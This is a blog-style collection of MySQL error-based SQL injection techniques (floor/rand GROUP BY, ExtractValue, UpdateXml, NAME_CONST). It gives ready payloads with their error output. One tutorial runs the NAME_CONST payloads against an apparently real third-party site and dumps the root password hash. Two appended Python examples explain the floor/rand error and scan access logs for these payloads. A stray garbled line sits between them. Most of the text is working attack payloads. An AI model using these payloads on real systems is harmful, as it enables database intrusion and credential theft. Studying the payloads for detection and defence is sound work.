MySQL error-based injection: exploiting the floor, ExtractValue and UpdateXml error modes

Posted on 2015-11-11 19:03:37

1. Triggering errors with floor

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example. First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is disclosed in the error message. To retrieve other data, replace the version() expression with the subquery you need.
For example, to retrieve the administrator username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'


Further collected material:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
Error-based injection on newer MySQL versions: injecting with NAME_CONST
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

|------|
| TEST |
|------|
|  1   |
|------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const

Intro to MySQL Variables
Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'

Now let's get the tables out this bitch...

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here, if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'

Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'
Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this....

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
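As an added example (not part of the original post), the following Python simulation shows why the floor(rand(0)*2) GROUP BY trick from section 1 ends in ERROR 1062, and why Method 2 needs a derived table of at least three rows. It assumes MySQL's RAND(N) generator as implemented in its my_rnd() routine, and MySQL's behaviour of evaluating the GROUP BY key expression once to look a group up and a second time when inserting a new group into the temporary table.

```python
from typing import Iterator, List, Optional

MAX_VALUE = 0x3FFFFFFF  # modulus of MySQL's linear congruential generator (assumption: as in my_rnd())


def mysql_rand(seed: int) -> Iterator[float]:
    """Reproduce MySQL's RAND(seed) sequence of doubles in [0, 1) (assumed algorithm)."""
    seed1 = (seed * 0x10001 + 55555555) % MAX_VALUE
    seed2 = (seed * 0x10000001) % MAX_VALUE
    while True:
        seed1 = (seed1 * 3 + seed2) % MAX_VALUE
        seed2 = (seed1 + seed2 + 33) % MAX_VALUE
        yield seed1 / MAX_VALUE


def floor_rand_sequence(n: int, seed: int = 0) -> List[int]:
    """First n values of floor(rand(seed)*2). RAND(0) is seeded, so the sequence is fixed."""
    gen = mysql_rand(seed)
    return [int(next(gen) * 2) for _ in range(n)]


def simulate_group_by(row_count: int, prefix: str, seed: int = 0) -> Optional[str]:
    """Simulate COUNT(*) ... GROUP BY concat(prefix, floor(rand(seed)*2)) over row_count rows.

    Returns the key MySQL would report in 'Duplicate entry ... for key group_key',
    or None when the query completes without error.
    """
    gen = mysql_rand(seed)
    groups = {}  # the temporary table: group key -> count
    for _ in range(row_count):
        lookup_key = prefix + str(int(next(gen) * 2))   # evaluation 1: is the group there?
        if lookup_key in groups:
            groups[lookup_key] += 1
            continue
        insert_key = prefix + str(int(next(gen) * 2))   # evaluation 2: key actually stored
        if insert_key in groups:
            return insert_key  # the lookup said "new", the store finds it present: ERROR 1062
        groups[insert_key] = 1
    return None


if __name__ == "__main__":
    print(floor_rand_sequence(8))                                  # 0 1 1 0 1 1 1 0
    print(simulate_group_by(2, "5.1.33-community-log"))            # None: two rows are not enough
    print(simulate_group_by(3, "5.1.33-community-log"))            # 5.1.33-community-log1
```

Row 1 is looked up under key "...0" and stored under "...1", row 2 is found under "...1", and row 3 is looked up under "...0" again but stored under "...1", which already exists; that is why the three-row union in Method 2 is the minimum and why information_schema.tables, with many rows, works as well.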
/ ]3 q) C$ N2 j

/ I4 `7 H/ E- n' H3 W- ^' G
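As an added defensive example (not from the original post), this Python snippet scans web-server access-log lines for the four payload shapes shown on this page: the floor(rand()*2) GROUP BY trick, extractvalue() and updatexml() wrapped around concat(), and a derived table with two NAME_CONST() columns. The log lines, addresses and paths are constructed for the example; the regexes are assumptions derived from the payloads above, not a vendor rule set.

```python
import re
from typing import Dict, List
from urllib.parse import unquote_plus

# Signature patterns, matched after URL decoding and whitespace normalisation.
SIGNATURES: Dict[str, re.Pattern] = {
    "floor-groupby": re.compile(r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\).*group\s+by", re.I | re.S),
    "extractvalue": re.compile(r"extractvalue\s*\(.*concat\s*\(", re.I | re.S),
    "updatexml": re.compile(r"updatexml\s*\(.*concat\s*\(", re.I | re.S),
    "name_const": re.compile(r"name_const\s*\(.*name_const\s*\(", re.I | re.S),
}


def normalise(query_string: str) -> str:
    """Decode %XX escapes and '+' (the page's payloads use both), then collapse whitespace."""
    return re.sub(r"\s+", " ", unquote_plus(query_string))


def scan_line(line: str) -> List[str]:
    """Return the names of the signatures matched by one combined-format access-log line."""
    match = re.search(r'"(?:GET|POST) (\S+)', line)  # the request target after the method
    if not match:
        return []
    text = normalise(match.group(1))
    return [name for name, pattern in SIGNATURES.items() if pattern.search(text)]


def scan_log(lines: List[str]) -> List[List[str]]:
    return [scan_line(line) for line in lines]


# Constructed sample log: one benign request followed by three payloads from the page.
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Nov/2015:19:03:37 +0800] "GET /article.php?id=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [11/Nov/2015:19:04:01 +0800] "GET /article.php?id=1+and+(select+1+from+(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1" 500 210',
    '203.0.113.5 - - [11/Nov/2015:19:04:15 +0800] "GET /article.php?id=1%20and%20extractvalue(1,concat(0x5c,(select%20user()))) HTTP/1.1" 500 198',
    '203.0.113.5 - - [11/Nov/2015:19:04:30 +0800] "GET /detail.php?id=330+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 230',
]

if __name__ == "__main__":
    for line, hits in zip(SAMPLE_LOG, scan_log(SAMPLE_LOG)):
        print(hits or "-", line.split('"')[1])
```

A hit on a request that also produced a 5xx response is a strong signal that the application is echoing database errors, which is exactly what every technique on this page depends on; the durable fixes are parameterised queries and returning a generic error page instead of the MySQL message.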